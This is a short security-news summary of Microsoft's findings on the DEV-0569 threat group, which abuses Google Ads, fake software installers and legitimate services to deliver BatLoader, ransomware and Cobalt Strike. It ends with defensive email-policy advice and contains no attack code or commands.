Microsoft researchers have identified a new threat activity cluster, which they are tracking as DEV-0569. Moreover, since August, this group has switched to several delivery tactics, and the most recent one abuses Google Ads to deliver BatLoader.
What has been revealed?
According to the report, attacks by DEV-0569 are evolving continuously, as the group is improving upon its evasion tactics, post-compromise payload delivery, and ransomware facilitation.
- From August to October, the group targeted its victims via malvertising attacks, sending them downloader links pretending to be simple applications such as Microsoft Teams, Zoom, Adobe Flash Player, AnyDesk, or LogMeIn.
- It uses a malware downloader, BatLoader, that drops the next stage payloads (via PowerShell commands), including Royal ransomware and Cobalt Strike Beacon implant.
Moreover, the group has been using the open-source tool Nsudo to disable the antivirus solutions on the targeted machine.
Shift in delivery methods
DEV-0569 was possibly using ZLoader as a delivery method at the beginning of this year and then shifted to BatLoader after the disruption of ZLoader in April.
- In September, the group started using contact forms on public websites to deliver information stealer payloads, by posing as a national financial authority.
- When the victims responded via email, they were sent a message containing a link to the so-called installer for legitimate applications mentioned above but delivered BatLoader, which was hosted on GitHub and OneDrive repositories.
- Besides the installer files, the group leveraged Virtual Hard Disk (VHD) file formats, impersonating legitimate software.
- In late October, DEV-0569 malvertising campaigns were observed leveraging Google Ads, blending within the normal web traffic to avoid detection. The group was further observed using the legitimate Traffic Distribution System (TDS) Keitaro to selectively pick victims to deliver the payloads.
Concluding note
DEV-0569 is abusing genuine services such as Google Ads, GitHub, and OneDrive and tools like Keitaro to stay invisible. To stay secure from such attacks, organizations are suggested to define strict email policies and implement mail flow rules to restrict the IP ranges and domain-level allowed to be circulated inside the organization.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/cb4f_shutterstock_2121565862.jpeg)
/https://cyware-ent.s3.amazonaws.com/image_bank/3f16_shutterstock_703450378.jpeg)
